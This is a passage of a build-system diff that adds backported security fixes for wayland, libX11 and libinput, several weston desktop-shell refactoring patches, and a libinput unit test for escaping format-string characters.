327+ { "foobar", "foobar" },
328+ { "", "" },
329+ { "%", "%%" },
330+ { "%%%%", "%%%%%%%%" },
331+ { "x %s", "x %%s" },
332+ { "x %", "x %%" },
333+ { "%sx", "%%sx" },
334+ { "%s%s", "%%s%%s" },
335+ { NULL, NULL },
336+ };
337+
338+ for (struct strsanitize_test *t = tests; t->string; t++) {
339+ char *sanitized = str_sanitize(t->string);
340+ ck_assert_str_eq(sanitized, t->expected);
341+ free(sanitized);
342+ }
343+}
344+END_TEST
345+
346 START_TEST(list_test_insert)
347 {
348 struct list_test {
349@@ -1138,6 +1138,7 @@
350 tcase_add_test(tc, strsplit_test);
351 tcase_add_test(tc, kvsplit_double_test);
352 tcase_add_test(tc, strjoin_test);
353+ tcase_add_test(tc, strsanitize_test);
354 tcase_add_test(tc, time_conversion);
355
356 tcase_add_test(tc, list_test_insert);
357
358--
359GitLab
360
diff --git a/meta/recipes-graphics/wayland/libinput_1.15.2.bb b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
index 810532774e..d7927d132a 100644
--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
14 14
15SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \ 15SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
16 file://determinism.patch \ 16 file://determinism.patch \
17 file://CVE-2022-1215.patch \
17 " 18 "
18SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643" 19SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
19SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747" 20SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
1From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
2From: Derek Foreman <derek.foreman@collabora.com>
3Date: Fri, 28 Jan 2022 13:18:37 -0600
4Subject: [PATCH] util: Limit size of wl_map
5
6Since server IDs are basically indistinguishable from really big client
7IDs at many points in the source, it's theoretically possible to overflow
8a map and either overflow server IDs into the client ID space, or grow
9client IDs into the server ID space. This would currently take a massive
10amount of RAM, but the definition of massive changes yearly.
11
12Prevent this by placing a ridiculous but arbitrary upper bound on the
13number of items we can put in a map: 0xF00000, somewhere over 15 million.
14This should satisfy pathological clients without restriction, but stays
15well clear of the 0xFF000000 transition point between server and client
16IDs. It will still take an improbable amount of RAM to hit this, and a
17client could still exhaust all RAM in this way, but our goal is to prevent
18overflow and undefined behaviour.
19
20Fixes #224
21
22Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
23
24Upstream-Status: Backport
25CVE: CVE-2021-3782
26
27Reference to upstream patch:
28https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
29
30[DP: adjust context for wayland version 1.20.0]
31Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
32---
33 src/wayland-private.h | 1 +
34 src/wayland-util.c | 25 +++++++++++++++++++++++--
35 2 files changed, 24 insertions(+), 2 deletions(-)
36
37diff --git a/src/wayland-private.h b/src/wayland-private.h
38index 9bf8cb7..35dc40e 100644
39--- a/src/wayland-private.h
40+++ b/src/wayland-private.h
41@@ -45,6 +45,7 @@
42 #define WL_MAP_SERVER_SIDE 0
43 #define WL_MAP_CLIENT_SIDE 1
44 #define WL_SERVER_ID_START 0xff000000
45+#define WL_MAP_MAX_OBJECTS 0x00f00000
46 #define WL_CLOSURE_MAX_ARGS 20
47
48 struct wl_object {
49diff --git a/src/wayland-util.c b/src/wayland-util.c
50index d5973bf..3e45d19 100644
51--- a/src/wayland-util.c
52+++ b/src/wayland-util.c
53@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
54 union map_entry *start, *entry;
55 struct wl_array *entries;
56 uint32_t base;
57+ uint32_t count;
58
59 if (map->side == WL_MAP_CLIENT_SIDE) {
60 entries = &map->client_entries;
61@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
62 start = entries->data;
63 }
64
65+ /* wl_array only grows, so if we have too many objects at
66+ * this point there's no way to clean up. We could be more
67+ * pro-active about trying to avoid this allocation, but
68+ * it doesn't really matter because at this point there is
69+ * nothing to be done but disconnect the client and delete
70+ * the whole array either way.
71+ */
72+ count = entry - start;
73+ if (count > WL_MAP_MAX_OBJECTS) {
74+ /* entry->data is freshly malloced garbage, so we'd
75+ * better make it a NULL so wl_map_for_each doesn't
76+ * dereference it later. */
77+ entry->data = NULL;
78+ return 0;
79+ }
80 entry->data = data;
81 entry->next |= (flags & 0x1) << 1;
82
83- return (entry - start) + base;
84+ return count + base;
85 }
86
87 int
88@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
89 i -= WL_SERVER_ID_START;
90 }
91
92+ if (i > WL_MAP_MAX_OBJECTS)
93+ return -1;
94+
95 count = entries->size / sizeof *start;
96 if (count < i)
97 return -1;
98@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
99 i -= WL_SERVER_ID_START;
100 }
101
102- count = entries->size / sizeof *start;
103+ if (i > WL_MAP_MAX_OBJECTS)
104+ return -1;
105
106+ count = entries->size / sizeof *start;
107 if (count < i)
108 return -1;
109
110--
1112.37.3
diff --git a/meta/recipes-graphics/wayland/wayland_1.18.0.bb b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
index 00be3aac27..e621abddbf 100644
--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
18 file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \ 18 file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
19 file://0001-build-Fix-strndup-detection-on-MinGW.patch \ 19 file://0001-build-Fix-strndup-detection-on-MinGW.patch \
20 file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \ 20 file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
21 file://CVE-2021-3782.patch \
21 " 22 "
22SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65" 23SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
23SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d" 24SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
1From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 20:03:49 +0200
4Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
5 top-level surface
6
7The shsurf is calloc'ed so the surface count is always 0. Not only
8that but the surface is not set as active by default, so there's no
9need to de-activate it.
10
11Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
12Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
13---
14 desktop-shell/shell.c | 2 --
15 1 file changed, 2 deletions(-)
16
17diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
18index 442a625f..3791be25 100644
19--- a/desktop-shell/shell.c
20+++ b/desktop-shell/shell.c
21@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
22 wl_list_init(&shsurf->children_link);
23
24 weston_desktop_surface_set_user_data(desktop_surface, shsurf);
25- weston_desktop_surface_set_activated(desktop_surface,
26- shsurf->focus_count > 0);
27 }
28
29 static void
30--
312.34.1
32
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
1From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 21:40:22 +0200
4Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
5 activate/de-activate
6
7This way it better reflects that it handles activation rather that input
8focus.
9
10Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
11Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
12---
13 desktop-shell/shell.c | 8 ++++----
14 1 file changed, 4 insertions(+), 4 deletions(-)
15
16diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
17index 3791be25..c4669f11 100644
18--- a/desktop-shell/shell.c
19+++ b/desktop-shell/shell.c
20@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
21 }
22
23 static void
24-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
25+shell_surface_deactivate(struct shell_surface *shsurf)
26 {
27 if (--shsurf->focus_count == 0)
28 weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
29 }
30
31 static void
32-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
33+shell_surface_activate(struct shell_surface *shsurf)
34 {
35 if (shsurf->focus_count++ == 0)
36 weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
37@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
38 if (seat->focused_surface) {
39 struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
40 if (shsurf)
41- shell_surface_lose_keyboard_focus(shsurf);
42+ shell_surface_deactivate(shsurf);
43 }
44
45 seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
46@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
47 if (seat->focused_surface) {
48 struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
49 if (shsurf)
50- shell_surface_gain_keyboard_focus(shsurf);
51+ shell_surface_activate(shsurf);
52 }
53 }
54
55--
562.34.1
57
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
1From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 21:44:26 +0200
4Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
5 activating
6
7We shouldn't be constrained by having a keyboard plugged-in, so avoid
8activating/de-activating the window/surface in the keyboard focus
9handler and embed it straight into the window activation part.
10
11Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
12Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
13---
14 desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
15 1 file changed, 25 insertions(+), 16 deletions(-)
16
17diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
18index c4669f11..c6a4fe91 100644
19--- a/desktop-shell/shell.c
20+++ b/desktop-shell/shell.c
21@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
22 static void
23 handle_keyboard_focus(struct wl_listener *listener, void *data)
24 {
25- struct weston_keyboard *keyboard = data;
26- struct shell_seat *seat = get_shell_seat(keyboard->seat);
27-
28- if (seat->focused_surface) {
29- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
30- if (shsurf)
31- shell_surface_deactivate(shsurf);
32- }
33-
34- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
35-
36- if (seat->focused_surface) {
37- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
38- if (shsurf)
39- shell_surface_activate(shsurf);
40- }
41+ /* FIXME: To be removed later. */
42 }
43
44 /* The surface will be inserted into the list immediately after the link
45@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
46 struct shell_surface *shsurf_child, *tmp;
47 struct weston_surface *surface =
48 weston_desktop_surface_get_surface(desktop_surface);
49+ struct weston_seat *seat;
50
51 if (!shsurf)
52 return;
53@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
54 }
55 wl_list_remove(&shsurf->children_link);
56
57+ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
58+ struct shell_seat *shseat = get_shell_seat(seat);
59+ /* activate() controls the focused surface activation and
60+ * removal of a surface requires invalidating the
61+ * focused_surface to avoid activate() use a stale (and just
62+ * removed) surface when attempting to de-activate it. It will
63+ * also update the focused_surface once it has a chance to run.
64+ */
65+ if (surface == shseat->focused_surface)
66+ shseat->focused_surface = NULL;
67+ }
68+
69 wl_signal_emit(&shsurf->destroy_signal, shsurf);
70
71 if (shsurf->fullscreen.black_view)
72@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
73 struct workspace *ws;
74 struct weston_surface *old_es;
75 struct shell_surface *shsurf, *shsurf_child;
76+ struct shell_seat *shseat = get_shell_seat(seat);
77
78 main_surface = weston_surface_get_main_surface(es);
79 shsurf = get_shell_surface(main_surface);
80@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
81
82 weston_view_activate(view, seat, flags);
83
84+ if (shseat->focused_surface) {
85+ struct shell_surface *current_focus =
86+ get_shell_surface(shseat->focused_surface);
87+ assert(current_focus);
88+ shell_surface_deactivate(current_focus);
89+ }
90+
91+ shseat->focused_surface = main_surface;
92+ shell_surface_activate(shsurf);
93+
94 state = ensure_focus_state(shell, seat);
95 if (state == NULL)
96 return;
97--
982.34.1
99
diff --git a/meta/recipes-graphics/wayland/weston_8.0.0.bb b/meta/recipes-graphics/wayland/weston_8.0.0.bb
index 0b383f25f3..5e4e2032c9 100644
--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
10 file://weston.desktop \ 10 file://weston.desktop \
11 file://xwayland.weston-start \ 11 file://xwayland.weston-start \
12 file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \ 12 file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
13 file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
14 file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
15 file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
13" 16"
14SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3" 17SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
15SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848" 18SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"
diff --git a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
index 65348c3762..baaf8fa9ad 100644
--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Touchscreen calibration data from xinput-calibrator" 1SUMMARY = "Touchscreen calibration data from xinput-calibrator"
2DESCRIPTION = "A generic touchscreen calibration program for X.Org"
3HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
4BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
2LICENSE = "MIT" 5LICENSE = "MIT"
3LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420" 6LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
4 7
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe..e524b82dd6 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
12REQUIRED_DISTRO_FEATURES = "x11" 12REQUIRED_DISTRO_FEATURES = "x11"
13 13
14SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46" 14SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
15SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \ 15SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
16 file://30xinput_calibrate.sh \ 16 file://30xinput_calibrate.sh \
17 file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \ 17 file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
18 file://0001-calibrator.hh-Include-string-to-get-std-string.patch \ 18 file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 553840ddb8..685362ef15 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
13PV = "2.99.917+git${SRCPV}" 13PV = "2.99.917+git${SRCPV}"
14S = "${WORKDIR}/git" 14S = "${WORKDIR}/git"
15 15
16SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel" 16SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
17 17
18UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" 18UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
19 19
diff --git a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
index bf8385fe6d..6a91582068 100644
--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -14,8 +14,6 @@ SOURCE_DATE_EPOCH = "1613559011"
14 14
15PE = "1" 15PE = "1"
16PR = "r3" 16PR = "r3"
17HASHEQUIV_HASH_VERSION .= ".1"
18
19 17
20inherit allarch features_check 18inherit allarch features_check
21 19
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
1From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Fri, 19 Feb 2021 15:30:39 +0100
4Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
5 the wire
6
7The X protocol uses CARD16 values to represent the length so
8this would overflow.
9
10CVE-2021-31535
11
12Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
13
14https://lists.x.org/archives/xorg-announce/2021-May/003088.html
15
16XLookupColor() and other X libraries function lack proper validation
17of the length of their string parameters. If those parameters can be
18controlled by an external application (for instance a color name that
19can be emitted via a terminal control sequence) it can lead to the
20emission of extra X protocol requests to the X server.
21
22Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
23CVE: CVE-2021-31535
24Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
25---
26 src/Font.c | 6 ++++--
27 src/FontInfo.c | 3 +++
28 src/FontNames.c | 3 +++
29 src/GetColor.c | 4 ++++
30 src/LoadFont.c | 4 ++++
31 src/LookupCol.c | 6 ++++--
32 src/ParseCol.c | 5 ++++-
33 src/QuExt.c | 5 +++++
34 src/SetFPath.c | 8 +++++++-
35 src/SetHints.c | 7 +++++++
36 src/StNColor.c | 3 +++
37 src/StName.c | 7 ++++++-
38 12 files changed, 54 insertions(+), 7 deletions(-)
39
40diff --git a/src/Font.c b/src/Font.c
41index 09d2ae91..3f468e4b 100644
42--- a/src/Font.c
43+++ b/src/Font.c
44@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
45 XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
46 #endif
47
48+ if (strlen(name) >= USHRT_MAX)
49+ return NULL;
50 if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
51 return font_result;
52 LockDisplay(dpy);
53@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
54
55 if (!name)
56 return 0;
57- l = strlen(name);
58- if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
59+ l = (int) strlen(name);
60+ if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
61 return 0;
62 charset = NULL;
63 /* next three lines stolen from _XkbGetCharset() */
64diff --git a/src/FontInfo.c b/src/FontInfo.c
65index f870e431..51b48e29 100644
66--- a/src/FontInfo.c
67+++ b/src/FontInfo.c
68@@ -58,6 +58,9 @@ XFontStruct **info) /* RETURN */
69 register xListFontsReq *req;
70 int j;
71
72+ if (strlen(pattern) >= USHRT_MAX)
73+ return NULL;
74+
75 LockDisplay(dpy);
76 GetReq(ListFontsWithInfo, req);
77 req->maxNames = maxNames;
78diff --git a/src/FontNames.c b/src/FontNames.c
79index b78792d6..4dac4916 100644
80--- a/src/FontNames.c
81+++ b/src/FontNames.c
82@@ -51,6 +51,9 @@ int *actualCount) /* RETURN */
83 register xListFontsReq *req;
84 unsigned long rlen = 0;
85
86+ if (strlen(pattern) >= USHRT_MAX)
87+ return NULL;
88+
89 LockDisplay(dpy);
90 GetReq(ListFonts, req);
91 req->maxNames = maxNames;
92diff --git a/src/GetColor.c b/src/GetColor.c
93index cd0eb9f6..512ac308 100644
94--- a/src/GetColor.c
95+++ b/src/GetColor.c
96@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
97 #ifdef HAVE_CONFIG_H
98 #include <config.h>
99 #endif
100+#include <limits.h>
101 #include <stdio.h>
102 #include "Xlibint.h"
103 #include "Xcmsint.h"
104@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
105 XcmsColor cmsColor_exact;
106 Status ret;
107
108+ if (strlen(colorname) >= USHRT_MAX)
109+ return (0);
110+
111 #ifdef XCMS
112 /*
113 * Let's Attempt to use Xcms and i18n approach to Parse Color
114diff --git a/src/LoadFont.c b/src/LoadFont.c
115index f547976b..85735249 100644
116--- a/src/LoadFont.c
117+++ b/src/LoadFont.c
118@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
119 #ifdef HAVE_CONFIG_H
120 #include <config.h>
121 #endif
122+#include <limits.h>
123 #include "Xlibint.h"
124
125 Font
126@@ -38,6 +39,9 @@ XLoadFont (
127 Font fid;
128 register xOpenFontReq *req;
129
130+ if (strlen(name) >= USHRT_MAX)
131+ return (0);
132+
133 if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
134 return fid;
135
136diff --git a/src/LookupCol.c b/src/LookupCol.c
137index f7f969f5..cd9b1368 100644
138--- a/src/LookupCol.c
139+++ b/src/LookupCol.c
140@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
141 #ifdef HAVE_CONFIG_H
142 #include <config.h>
143 #endif
144+#include <limits.h>
145 #include <stdio.h>
146 #include "Xlibint.h"
147 #include "Xcmsint.h"
148@@ -46,6 +47,9 @@ XLookupColor (
149 XcmsCCC ccc;
150 XcmsColor cmsColor_exact;
151
152+ n = (int) strlen (spec);
153+ if (n >= USHRT_MAX)
154+ return 0;
155 #ifdef XCMS
156 /*
157 * Let's Attempt to use Xcms and i18n approach to Parse Color
158@@ -77,8 +81,6 @@ XLookupColor (
159 * Xcms and i18n methods failed, so lets pass it to the server
160 * for parsing.
161 */
162-
163- n = strlen (spec);
164 LockDisplay(dpy);
165 GetReq (LookupColor, req);
166 req->cmap = cmap;
167diff --git a/src/ParseCol.c b/src/ParseCol.c
168index e997b1b8..180132dd 100644
169--- a/src/ParseCol.c
170+++ b/src/ParseCol.c
171@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
172 #ifdef HAVE_CONFIG_H
173 #include <config.h>
174 #endif
175+#include <limits.h>
176 #include <stdio.h>
177 #include "Xlibint.h"
178 #include "Xcmsint.h"
179@@ -46,7 +47,9 @@ XParseColor (
180 XcmsColor cmsColor;
181
182 if (!spec) return(0);
183- n = strlen (spec);
184+ n = (int) strlen (spec);
185+ if (n >= USHRT_MAX)
186+ return(0);
187 if (*spec == '#') {
188 /*
189 * RGB
190diff --git a/src/QuExt.c b/src/QuExt.c
191index 4e230e77..d38a1572 100644
192--- a/src/QuExt.c
193+++ b/src/QuExt.c
194@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
195 #ifdef HAVE_CONFIG_H
196 #include <config.h>
197 #endif
198+#include <limits.h>
199+#include <stdbool.h>
200 #include "Xlibint.h"
201
202 Bool
203@@ -40,6 +42,9 @@ XQueryExtension(
204 xQueryExtensionReply rep;
205 register xQueryExtensionReq *req;
206
207+ if (strlen(name) >= USHRT_MAX)
208+ return false;
209+
210 LockDisplay(dpy);
211 GetReq(QueryExtension, req);
212 req->nbytes = name ? strlen(name) : 0;
213diff --git a/src/SetFPath.c b/src/SetFPath.c
214index 60aaef01..3d8c50cb 100644
215--- a/src/SetFPath.c
216+++ b/src/SetFPath.c
217@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
218
219 #ifdef HAVE_CONFIG_H
220 #include <config.h>
221+#include <limits.h>
222 #endif
223 #include "Xlibint.h"
224
225@@ -48,7 +49,12 @@ XSetFontPath (
226 GetReq (SetFontPath, req);
227 req->nFonts = ndirs;
228 for (i = 0; i < ndirs; i++) {
229- n += safestrlen (directories[i]) + 1;
230+ n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
231+ if (n >= USHRT_MAX) {
232+ UnlockDisplay(dpy);
233+ SyncHandle();
234+ return 0;
235+ }
236 }
237 nbytes = (n + 3) & ~3;
238 req->length += nbytes >> 2;
239diff --git a/src/SetHints.c b/src/SetHints.c
240index bc46498a..f3d727ec 100644
241--- a/src/SetHints.c
242+++ b/src/SetHints.c
243@@ -49,6 +49,7 @@ SOFTWARE.
244 #ifdef HAVE_CONFIG_H
245 #include <config.h>
246 #endif
247+#include <limits.h>
248 #include <X11/Xlibint.h>
249 #include <X11/Xutil.h>
250 #include "Xatomtype.h"
251@@ -214,6 +215,8 @@ XSetCommand (
252 register char *buf, *bp;
253 for (i = 0, nbytes = 0; i < argc; i++) {
254 nbytes += safestrlen(argv[i]) + 1;
255+ if (nbytes >= USHRT_MAX)
256+ return 1;
257 }
258 if ((bp = buf = Xmalloc(nbytes))) {
259 /* copy arguments into single buffer */
260@@ -256,6 +259,8 @@ XSetStandardProperties (
261
262 if (name != NULL) XStoreName (dpy, w, name);
263
264+ if (safestrlen(icon_string) >= USHRT_MAX)
265+ return 1;
266 if (icon_string != NULL) {
267 XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
268 PropModeReplace,
269@@ -298,6 +303,8 @@ XSetClassHint(
270
271 len_nm = safestrlen(classhint->res_name);
272 len_cl = safestrlen(classhint->res_class);
273+ if (len_nm + len_cl >= USHRT_MAX)
274+ return 1;
275 if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
276 if (len_nm) {
277 strcpy(s, classhint->res_name);
278diff --git a/src/StNColor.c b/src/StNColor.c
279index 8b821c3e..ba021958 100644
280--- a/src/StNColor.c
281+++ b/src/StNColor.c
282@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
283 #ifdef HAVE_CONFIG_H
284 #include <config.h>
285 #endif
286+#include <limits.h>
287 #include <stdio.h>
288 #include "Xlibint.h"
289 #include "Xcmsint.h"
